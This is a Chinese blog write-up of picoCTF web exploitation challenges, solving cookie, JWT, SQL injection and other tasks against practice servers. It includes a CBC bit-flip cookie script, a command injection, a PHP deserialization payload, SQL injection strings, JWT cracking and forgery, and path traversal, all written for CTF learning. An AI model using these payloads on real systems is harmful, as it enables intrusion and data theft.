文章目录
- 1. GET aHEAD
- 2. Cookies
- 3. Insp3ct0r
- 4. Scavenger Hunt
- 5. Bookmarklet
- 6. where are the robots
- 7. It is my Birthday
- 8. logon
- 9. dont-use-client-side
- 10. picobrowser
- 11. Client-side-again
- 12. Java Code Analysis!?!
- 13. Who are you
- 14. Login
- 15. JaWT Scratchpad
- 16. Some Assembly Required 1
- 17. More Cookies
- 18. caas
- 19. Some Assembly Required 2
- 20. SQL Direct
- 21. JAuth
- 22. Includes
- 23. Inspect HTML
- 24. Local Authority
- 25. Search source
- 26. findme
- 27. MatchTheRegex
- 28. SOAP
- 29. IntroToBurp
- 30. Unminify
- 31. Super Serial
- 32. Most Cookies
- 33. Forbidden Paths
- 34. Power Cookie
- 35. Roboto Sans
- 36. Web Gauntlet
- 37. Web Gauntlet 2
- 38. Web Gauntlet 3
- 39. Secrets
- 40. SQLiLite
- 41. More SQLi
- 42. Trickster
1. GET aHEAD
Find the flag being held on this server to get ahead of the competition
Hints
Check out tools like Burpsuite to modify your requests and look at the responses
根据提示使用不同的请求方式得到response可能会得到结果
使用抓包工具Burp Suit抓取链接请求信息
修改请求方式POST/GET为HEAD发送请求,获取包含flag的响应信息
The
HEADmethod asks for a response identical to aGETrequest, but without the response body.
HEAD方法请求与GET请求相同的响应,但没有响应正文。
Burp Suite是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。
本题中使用Proxy拦截请求的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。
Repeater手动操作来补发单独的HTTP 请求,并分析应用程序响应。
2. Cookies
Who doesn’t love cookies? Try to figure out the best one.
通过浏览器devTools工具获取cookie
发现一个value为-1
修改cookie值-1为1刷新页面得到**I love chocolate chip cookies!**
随着value 的值不断更新,返回提示信息也会不断更改,直到value=18
手动修改value值比较麻烦,可以使用python脚本找出value在一定范围内且返回信息包含有
I love字符串的,不包含的打印出来看看结果
import requests
url = "http://mercury.picoctf.net:29649/check"
for i in range(0, 20):
text = str(i)
cookies = {
'name': text
}
r = requests.get(url, cookies=cookies)
result = r.text.split(
"<p style=\"text-align:center; font-size:30px;\"><b>")[1].split("</b>")[0]
print("[+] Testing Cookie:{} | Result: {}".format(i, result))
if 'I love' not in result:
print(r.text.split("<code>")[1].split("</code>")[0])
break
3. Insp3ct0r
Kishor Balan tipped us off that the following code may need inspection
Hints
How do you inspect web code on a browser?
There's 3 parts
根据提示检查代码,发现注释中有Flag信息,由三部分组成
HTML部分:
<!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 -→
CSS部分:
/* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */
JS部分:
/* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?2e7b23e3} */
组合:picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?2e7b23e3}
4. Scavenger Hunt
There is some interesting information hidden around this site
Hints
You should have enough hints to find the files, don't run a brute forcer.
一些有趣的信息隐藏在网站中
和上一题一样在HTML CSS JS中寻找三部分flag组合
不过在JS中提示/* How can I keep Google from indexing my website? */
robots.txt是网站管理者写给爬虫的一封信,里面描述了网站管理者不希望爬虫做的事
访问robot.tx文件得到
# Part 3: t_0f_pl4c
# I think this is an apache server... can you Access the next flag?
提示还有第四部分,使用apache作为服务器那么换成.htaccess
得到
# Part 4: 3s_2_lO0k
# I love making websites on my Mac, I can Store a lot of information there.
使用mac数据库访问.DS_Store
.DS_Store是 Desktop Services Store 的缩写,是 macOS 操作系统上的一个不可见文件
Congrats! You completed the scavenger hunt. Part 5: _fa04427c}
组合Flag:picoCTF{th4ts_4_l0t_0f_pl4c3s_2_lO0k_fa04427c}
5. Bookmarklet
Description
Why search for the flag when I can make a bookmarklet to print it for me?
Additional details will be available after launching your challenge instance.
Hints
A bookmarklet is a bookmark that runs JavaScript instead of loading a webpage.
What happens when you click a bookmarklet?
Web browsers have other ways to run JavaScript too.
通过在线运行JS计算得到结果
6. where are the robots
Description
Can you find the robots?
Hints
What part of the website could tell you where the creator doesn't want you to look?
网址后加robots.txt得到一个html,访问这个html得到结果
7. It is my Birthday
Description
I sent out 2 invitations to all of my friends for my birthday! I’ll know if they get stolen because the two invites look similar, and they even have the same md5 hash, but they are slightly different! You wouldn’t believe how long it took me to find a collision. Anyway, see if you’re invited by submitting 2 PDFs to my website.
Hints
Look at the category of this problem.
How may a PHP site check the rules in the description?
上传两个相同md5值的pdf文件得到响应结果
8. logon
Description
The factory is hiding things from all of its users. Can you login as Joe and find what they’ve been looking at?
Hints
Hmm it doesn't seem to check anyone's password, except for Joe's?
提示除了Joe其他用户不验证密码
试试admin直接空密码登录,提示成功不过没有Flag
查看cookie发现admin的值是False,那么把值改成True 刷新得到Flag
9. dont-use-client-side
Description
Can you break into this super secure portal?
Hints
Never trust the client
随便输入密码验证,弹窗提示说明是js验证的
通过查看js看到Flag的片段,重组一下
<script type="text/javascript">
function verify() {
checkpass = document.getElementById("pass").value;
split = 4;
if (checkpass.substring(0, split) == 'pico') {
if (checkpass.substring(split*6, split*7) == '706c') {
if (checkpass.substring(split, split*2) == 'CTF{') {
if (checkpass.substring(split*4, split*5) == 'ts_p') {
if (checkpass.substring(split*3, split*4) == 'lien') {
if (checkpass.substring(split*5, split*6) == 'lz_b') {
if (checkpass.substring(split*2, split*3) == 'no_c') {
if (checkpass.substring(split*7, split*8) == '5}') {
alert("Password Verified")
}
}
}
}
}
}
}
}
else {
alert("Incorrect password");
}
}
</script>
checkpass.substring(0, 4) == 'pico'
checkpass.substring(4, 8) == 'CTF{'
checkpass.substring(8, 12) == 'no_c'
checkpass.substring(12, 16) == 'lien'
checkpass.substring(16, 20) == 'ts_p'
checkpass.substring(20, 24) == 'lz_b'
checkpass.substring(24, 28) == '706c'
checkpass.substring(28, 32) == '5}'
picoCTF{no_clients_plz_b706c5}
10. picobrowser
Description
This website can be rendered only by picobrowser, go and catch the flag!
Hints
You don't need to download a new web browser
点击Flag提示只能用picobrowser访问
修改请求头User-Agent属性为picobrowser,再次请求得到结果
11. Client-side-again
Description
Can you break into this super secure portal?
Hints
What is obfuscation?
又一个js验证密码的,找到js文件,格式化一下得到
< script type = "text/javascript" >
var _0x5a46 = ['f49bf}', '_again_e', 'this', 'Password\x20Verified', 'Incorrect\x20password', 'getElementById', 'value', 'substring', 'picoCTF{', 'not_this'];
(function(_0x4bd822, _0x2bd6f7) {
var _0xb4bdb3 = function(_0x1d68f6) {
while (--_0x1d68f6) {
_0x4bd822['push'](_0x4bd822['shift']());
}
};
_0xb4bdb3(++_0x2bd6f7);
}(_0x5a46, 0x1b3));
var _0x4b5b = function(_0x2d8f05, _0x4b81bb) {
_0x2d8f05 = _0x2d8f05 - 0x0;
var _0x4d74cb = _0x5a46[_0x2d8f05];
return _0x4d74cb;
};
function verify() {
checkpass = document[_0x4b5b('0x0')]('pass')[_0x4b5b('0x1')];
split = 0x4;
if (checkpass[_0x4b5b('0x2')](0x0, split * 0x2) == _0x4b5b('0x3')) {
if (checkpass[_0x4b5b('0x2')](0x7, 0x9) == '{n') {
if (checkpass[_0x4b5b('0x2')](split * 0x2, split * 0x2 * 0x2) == _0x4b5b('0x4')) {
if (checkpass[_0x4b5b('0x2')](0x3, 0x6) == 'oCT') {
if (checkpass[_0x4b5b('0x2')](split * 0x3 * 0x2, split * 0x4 * 0x2) == _0x4b5b('0x5')) {
if (checkpass['substring'](0x6, 0xb) == 'F{not') {
if (checkpass[_0x4b5b('0x2')](split * 0x2 * 0x2, split * 0x3 * 0x2) == _0x4b5b('0x6')) {
if (checkpass[_0x4b5b('0x2')](0xc, 0x10) == _0x4b5b('0x7')) {
alert(_0x4b5b('0x8'));
}
}
}
}
}
}
}
} else {
alert(_0x4b5b('0x9'));
}
} <
/script>
picoCTF{not_this_again_ef49bf}
根据数组里的信息提取得到picoCTF{not_this_again_ef49bf}
12. Java Code Analysis!?!
picoCTF-Web Exploitation-Java Code Analysis!?!
13. Who are you
Description
Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:46199/
Hints
It ain't much, but it's an RFC [https://tools.ietf.org/html/rfc2616](https://tools.ietf.org/html/rfc2616)
通过修改请求Header参数满足需求,使用Burp suit修改Header
14. Login
Description
My dog-sitter’s brother made this website but I can’t get in; can you help?
随便输入用户名密码发现是JS弹窗验证
查看JS验证代码
(async()=>{
await new Promise((e=>window.addEventListener("load", e))),
document.querySelector("form").addEventListener("submit", (e=>{
e.preventDefault();
const r = {
u: "input[name=username]",
p: "input[name=password]"
}
, t = {};
for (const e in r)
t[e] = btoa(document.querySelector(r[e]).value).replace(/=/g, "");
return "YWRtaW4" !== t.u ? alert("Incorrect Username") : "cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ" !== t.p ? alert("Incorrect Password") : void alert(`Correct Password! Your flag is ${atob(t.p)}.`)
}
))
}
)();
发现btoa()函数
该WindowOrWorkerGlobalScope.btoa()方法从String对象创建一个base-64编码的ASCII字符串,其中字符串中的每个字符都被视为二进制数据的字节
base-64在线解码一下,得到密码Flag
15. JaWT Scratchpad
Description
Check the admin scratchpad!
Hints
What is that cookie?
Have you heard of JWT?
根据提示使用John登录拿到cookie中的jwt token
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiSm9obiJ9.K1Omo0Gk5saKwJTkkgT7PUZohD7USknEE0lmT2AYAiM
使用[John](https://github.com/openwall/john)密钥暴力破解密钥为ilovepico
$ john ../jwt.txt --wordlist=/root/utils/dics/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
ilovepico (?)
1g 0:00:00:00 DONE (2024-05-09 01:50) 1.479g/s 10967Kp/s 10967Kc/s 10967KC/s iluve$..iloveching25
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
使用密钥修改用户为admin 将生成的新token修改到cookie中刷新得到结果
16. Some Assembly Required 1
有限的信息可以看到Assembly是主角
使用浏览器devtools直接看源码,发现wasm中可以直接看到flag
17. More Cookies
Description
I forgot Cookies can Be modified Client-side, so now I decided to encrypt them!
Hints
https://en.wikipedia.org/wiki/Homomorphic_encryption
The search endpoint is only helpful for telling you if you are admin or not, you won't be able to guess the flag name
题目是cookies直接看cookie
dTc5MkIzanVzUDVJSysza1lqcHdVVlZTaEc5ZS9ZR2RDWjFWUUlJWFdpZ2VKVkhDYUsxVHJISDdaeXIzVW5UNS93OFJLbmdJaExFamNNcmJ0Zm5maWFXc1RIaVN3UldkSlAwZFlESVBjaVNmR08zOU9EQ0M3OUVTTlpiQ3Nyazc=
关于加密的,使用base64解密试一下
u792B3jusP5IK+3kYjpwUVVShG9e/YGdCZ1VQIIXWigeJVHCaK1TrHH7Zyr3UnT5/w8RKngIhLEjcMrbtfnfiaWsTHiSwRWdJP0dYDIPciSfGO39ODCC79ESNZbCsrk7
题目描述中发现C B C 大写,可能使用了密码块链 (CBC)。CBC 容易受到位翻转的影响。Crypto StackExchange 上的这个答案广泛解释了这种攻击。从本质上讲,有一个位可以确定用户是否是管理员。也许有一个像 admin=0 这样的参数,如果我们更改正确的位,那么我们可以设置 admin=1。但是,这个位的位置是未知的,所以我们可以尝试每个位置,直到我们得到标志。
使用python脚本
import requests
import base64
from tqdm import tqdm
ADDRESS = "http://mercury.picoctf.net:[34962](http://mercury.picoctf.net:34962/)/"
s = requests.Session()
s.get(ADDRESS)
cookie = s.cookies["auth_name"]
# Decode the cookie from base64 twice to reverse the encoding scheme.
decoded_cookie = base64.b64decode(cookie)
raw_cookie = base64.b64decode(decoded_cookie)
def exploit():
# Loop over all the bytes in the cookie.
for position_idx in tqdm(range(0, len(raw_cookie))):
# Loop over all the bits in the current byte at `position_idx`.
for bit_idx in range(0, 8):
# Construct the current guess.
# - All bytes before the current `position_idx` are left alone.
# - The byte in the `position_idx` has the bit at position `bit_idx` flipped.
# This is done by XORing the byte with another byte where all bits are zero
# except for the bit in position `bit_idx`. The code `1 << bit_idx`
# creates a byte by shifting the bit `1` to the left `bit_idx` times. Thus,
# the XOR operation will flip the bit in position `bit_idx`.
# - All bytes after the current `position_idx` are left alone.
bitflip_guess = (
raw_cookie[0:position_idx]
+ ((raw_cookie[position_idx] ^ (1 << bit_idx)).to_bytes(1, "big"))
+ raw_cookie[position_idx + 1 :]
)
# Double base64 encode the bit-blipped cookie following the encoding scheme.
guess = base64.b64encode(base64.b64encode(bitflip_guess)).decode()
# Send a request with the cookie to the application and scan for the
# beginning of the flag.
r = requests.get(ADDRESS, cookies={"auth_name": guess})
if "picoCTF{" in r.text:
print(f"Admin bit found in byte {position_idx} bit {bit_idx}.")
# The flag is between `<code>` and `</code>`.
print("Flag: " + r.text.split("<code>")[1].split("</code>")[0])
return
exploit()
18. caas
Description
Now presenting cowsay as a service
从下载的js文件看到使用了exec()函数执行,可能存在执行权限问题
按提示url加上message信息加;ls 结果输出目录,说明可执行
继续加上;cat flag.txt 得到flag
19. Some Assembly Required 2
直接查看devTools wasm,得到xor密文
使用在线解密工具得到结果
20. SQL Direct
Description
Connect to this PostgreSQL server and find the flag!
Additional details will be available after launching your challenge instance.
Hints
What does a SQL database contain?
登录PostgreSQL 查询数据库,得到flag
21. JAuth
Description
Most web application developers use third party components without testing their security. Some of the past affected companies are:
- Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
- Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
- VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one?
Hints
Use the web browser tools to check out the JWT cookie.
The JWT should always have two (2) . separators.
登录user用户得到tocken,解签得到payload信息
利用这个jwt漏洞测试web token
首先关闭安全性,将“alg”设置为“none”,然后将角色设置为“admin”,然后省略末尾的签名,但保留尾随句点。
将cookie中的值修改为新的token,刷新得到Flag
22. Includes
Description
Can you get the flag?
Additional details will be available after launching your challenge instance.
Hints
Is there more code than what the inspector initially shows?
23. Inspect HTML
Description
Can you get the flag?
Additional details will be available after launching your challenge instance.
Hints
What is the web inspector in web browsers?
24. Local Authority
Description
Can you get the flag?
Additional details will be available after launching your challenge instance.
Hints
How is the password checked on this website?
此题考查密码的验证
先随便登录一下
js中直接明文展示账号密码
登录查看flag
25. Search source
Description
The developer of this website mistakenly left an important artifact in the website source, can you find it?
Hints
How could you mirror the website on your local machine so you could use more powerful tools for searching?
提示flag在网站源码中,devTools查看源码,发现在style.css中
也可以下载网站源码到本地,然后快捷查找picoCTF字符找到flag
26. findme
Description
Help us test the form by submiting the username as test and password as test!The website
Hints
any redirections?
使用描述中提供的账号进行登陆,提示可能有多个重定向,那我们登录时打开devTools重点关注重定向信息
发现两个重定向地址
**请求 URL:** http://saturn.picoctf.net:62931/next-page/id=cGljb0NURntwcm94aWVzX2Fs
**请求 URL:** http://saturn.picoctf.net:62931/next-page/id=bF90aGVfd2F5X2JlNzE2ZDhlfQ==
id组合一下cGljb0NURntwcm94aWVzX2FsbF90aGVfd2F5X2JlNzE2ZDhlfQ== 像是base64加密信息,解密一下得到Flag
27. MatchTheRegex
Description
How about trying to match a regular expression
Additional details will be available after launching your challenge instance.
Hints
Access the webpage and try to match the regular expression associated with the text field
提示与正则匹配有关,先查看源码
发现一个以p开头H结束的注释,试一下flag前缀picoCTF,submit弹出结果
28. SOAP
Description
The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?
Hints
XML external entity Injection
描述中网站没有进行安全评估,让试试读取/etc/passwd文件,提示可以利用用XML注入
XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件
点击任意按钮,发现请求数据为XML
使用Brup suite抓取请求,构建XML为如下,重新发送,获取返回flag
29. IntroToBurp
Hints
Try using burpsuite to intercept request to capture the flag.
Try mangling the request, maybe their server-side code doesn't handle malformed requests very well.
尝试处理请求,也许他们的服务器端代码不能很好地处理格式错误的请求
首先填写表单提交,进入OPT提交页面
使用burpsuite拦截请求
我们根据提示来尝试修改opt请求参数,参数值修改意义不大,修改参数名称试试
30. Unminify
Description
I don’t like scrolling down to read the code of my website, so I’ve squished it. As a bonus, my pages load faster!
Hints
Try CTRL+U / ⌘+U in your browser to view the page source. You can also add 'view-source:' before the URL, or try curl <URL> in your shell.
Minification reduces the size of code, but does not change its functionality.
What tools do developers use when working on a website? Many text editors and browsers include formatting.
进入网页,提示使用ctrl+u查看页面源码,那就照做吧,结果直接找到了flag
31. Super Serial
Description
Try to recover the flag stored on this website http://mercury.picoctf.net:2148/
Hints
The flag is at ../flag
提示flag信息在服务器端上层目录下的flag文件中,我们在web目录下是找不到的
查看robots.txt看到一个admin.phps,那么我们可以查看页面的php源码(phps文件就是php的源代码文件)
先看http://mercury.picoctf.net:2148/index.phps,得到如下信息
看到有一个authentication.php页面,应该就是权限验证页面
if(isset($_POST["user"]) && isset($_POST["pass"])){
$con = new SQLite3("../users.db");
$username = $_POST["user"];
$password = $_POST["pass"];
$perm_res = new permissions($username, $password);
if ($perm_res->is_guest() || $perm_res->is_admin()) {
setcookie("login", urlencode(base64_encode(serialize($perm_res))), time() + (86400 * 30), "/");
header("Location: authentication.php");
die();
} else {
$msg = '<h6 class="text-center" style="color:red">Invalid Login.</h6>';
}
}
访问http://mercury.picoctf.net:2148/authentication.phps查看源码,找到有一个cookie.php页面
require_once("cookie.php");
if(isset($perm) && $perm->is_admin()){
$msg = "Welcome admin";
$log = new access_log("access.log");
$log->append_to_log("Logged in at ".date("Y-m-d")."\n");
} else {
$msg = "Welcome guest";
}
继续访问http://mercury.picoctf.net:2148/cookie.phps,找到如下代码
if(isset($_COOKIE["login"])){
try{
$perm = unserialize(base64_decode(urldecode($_COOKIE["login"])));
$g = $perm->is_guest();
$a = $perm->is_admin();
}
catch(Error $e){
die("Deserialization error. ".$perm);
}
}
使用了unserialize函数进行反序列化名为login的参数
试一试PHP的反序列化漏洞:
我们在登录 cookie 中存储一个序列化的 access_log 对象,log_file设置为 ../flag。此对象将在 try 块的第一行中进行反序列化。但是,access_log 类没有 is_guest 函数,因此$g = $perm->is_guest()它将失败,从而跳转到 catch 块。此 catch 块打印 $perm 的值,这是我们注入的access_log对象。通过打印$perm,调用了 access_log 对象的 _toString 方法,该方法将打印access_log的内容
构建access_log对象:O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}
base64加密一下:TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9
我们在authentication.php请求cookie中加入一个login的参数,得到Flag
32. Most Cookies
picoCTF-Web Exploitation-Most Cookies
33. Forbidden Paths
Description
Can you get the flag?We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt but the website is filtering absolute file paths. Can you get past the filter to read the flag?
描述中我们知道网站文件在/usr/share/nginx/html/ ****目录下,flag.txt在根目录下/
直接使用../../../../../flag.txt切换到根目录试一下,直接得出flag
34. Power Cookie
Description
Can you get the flag?
Hints
Do you know how to modify cookies?
这也是一个修改cookie的题,我们先直接点击按钮,查看cookie信息
看到isAdmin值是0,我们改成1,刷新一下直接得到flag
35. Roboto Sans
Description
The flag is somewhere on this web application not necessarily on the website. Find it.
根据题目我们试试找到robots.txt,直接访问得到信息
User-agent *
Disallow: /cgi-bin/
Think you have seen your flag or want to keep looking.
ZmxhZzEudHh0;anMvbXlmaW
anMvbXlmaWxlLnR4dA==
svssshjweuiwl;oiho.bsvdaslejg
Disallow: /wp-admin/
提示查看这里可以得到flag线索,下面有两串密文,我们用base64解密看看是什么
ZmxhZzEudHh0;anMvbXlmaW -- flag1.txtjs/myfi
anMvbXlmaWxlLnR4dA== -- js/myfile.txt
flag1.txt js/myfile.txt 两个都试一试,falg1.txt返回404,js/myfile.txt得到结果
36. Web Gauntlet
picoCTF-Web Exploitation-Web Gauntlet
37. Web Gauntlet 2
Description
This website looks familiar… Log in as admin
Site: http://mercury.picoctf.net:65261/
Filter: http://mercury.picoctf.net:65261/filter.php
Hints
I tried to make it a little bit less contrived since the mini competition.
Each filter is separated by a space. Spaces are not filtered.
There is only 1 round this time, when you beat it the flag will be in filter.php.
There is a length component now.
sqlite
Filters: or and true false union like = > < ; – / / admin
上一关中能用的关键词这一关中都被禁用了
过滤了admin因此我们继续使用ad'||'min
SELECT username, password FROM users WHERE username='ad'||'min' AND password='1'
下载就剩一个password匹配了,如何能匹配到任意密码:使用' glob '*
构建出的sql为
SELECT username, password FROM users WHERE username='ad'||'min' AND password='' glob '*'
刷新filter.php得到flag
<?php
session_start();
if (!isset($_SESSION["winner2"])) {
$_SESSION["winner2"] = 0;
}
$win = $_SESSION["winner2"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($win === 0) {
$filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
if ($view) {
echo "Filters: ".implode(" ", $filter)."<br/>";
}
} else if ($win === 1) {
if ($view) {
highlight_file("filter.php");
}
$_SESSION["winner2"] = 0; // <- Don't refresh!
} else {
$_SESSION["winner2"] = 0;
}
// picoCTF{0n3_m0r3_t1m3_e2db86ae880862ad471aa4c93343b2bf}
?>
38. Web Gauntlet 3
Description
Last time, I promise! Only 25 characters this time. Log in as admin Site: http://mercury.picoctf.net:8650/
Filter: http://mercury.picoctf.net:8650/filter.php
查看**filter.php**
Filters: or and true false union like = > < ; – / / admin
这不跟上一关一样吗,直接使用上一关用户名密码试试,提示成功,刷新filter.php拿到结果
<?php
session_start();
if (!isset($_SESSION["winner3"])) {
$_SESSION["winner3"] = 0;
}
$win = $_SESSION["winner3"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($win === 0) {
$filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
if ($view) {
echo "Filters: ".implode(" ", $filter)."<br/>";
}
} else if ($win === 1) {
if ($view) {
highlight_file("filter.php");
}
$_SESSION["winner3"] = 0; // <- Don't refresh!
} else {
$_SESSION["winner3"] = 0;
}
// picoCTF{k3ep_1t_sh0rt_6fdd78c92c7f26a10acd3ece176dea4d}
?>
39. Secrets
Description
We have several pages hidden. Can you find the one with the flag?The website is running here.
Hints
folders folders folders
根据提示应该有三个文件夹,查看源码发现一个secret
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta
name="viewport"
content="width=device-width, initial-scale=1, shrink-to-fit=no"
/>
<meta name="description" content="" />
<!-- Bootstrap core CSS -->
<link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet" />
<!-- title -->
<title>home</title>
<!-- css -->
<link href="secret/assets/index.css" rel="stylesheet" />
</head>
<body>
<!-- ***** Header Area Start ***** -->
<div class="topnav">
<a class="active" href="#home">Home</a>
<a href="about.html">About</a>
<a href="contact.html">Contact</a>
</div>
<div class="imgcontainer">
<img
src="secret/assets/DX1KYM.jpg"
alt="https://www.alamy.com/security-safety-word-cloud-concept-image-image67649784.html"
class="responsive"
/>
<div class="top-left">
<h1>If security wasn't your job, would you do it as a hobby?</h1>
</div>
</div>
</body>
</html>
访问http://saturn.picoctf.net:55637/secret/
提示步骤正确,继续看源码,找到一个hidden
<!DOCTYPE html>
<html>
<head>
<title></title>
<link rel="stylesheet" href="hidden/file.css" />
</head>
<body>
<h1>Finally. You almost found me. you are doing well</h1>
<img src="https://media1.tenor.com/images/0a6aff9f825af62c05adfbd75039cc7b/tenor.gif?itemid=4648337" alt="Something Like That GIF - Andy Parksandrecreation Wtf GIFs" style="max-width: 833px; background-color: rgb(151, 121, 85);" width="833" height="937.125">
</body>
......
</html>
访问http://saturn.picoctf.net:55637/secret/hidden/ 找到一个superhidden
<!DOCTYPE html>
<html>
<head>
<title>LOGIN</title>
<!-- css -->
<link href="superhidden/login.css" rel="stylesheet" />
</head>
</html>
访问http://saturn.picoctf.net:55637/secret/hidden/superhidden/ 查看源码找到flag
<!DOCTYPE html>
<html>
<head>
<title></title>
<link rel="stylesheet" href="mycss.css" />
</head>
<body>
<h1>Finally. You found me. But can you see me</h1>
<h3 class="flag">picoCTF{succ3ss_@h3n1c@10n_790d2615}</h3>
</body>
</html>
40. SQLiLite
Description
Can you login to this website?
Hints
'admin' is the user you want to login as.
使用admin登录,密码随便填得到sql语句
username: admin
password: 123
SQL query: SELECT * FROM users WHERE name='admin' AND password='123'
试一下密码 'or 1=1 -- 构建sql为
-- username: admin
-- password: 'or 1=1 --
SELECT * FROM users WHERE name='admin' AND password=''or 1=1 -- '
查看源码可得到flag
41. More SQLi
picoCTF-Web Exploitation-More SQLi
231
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
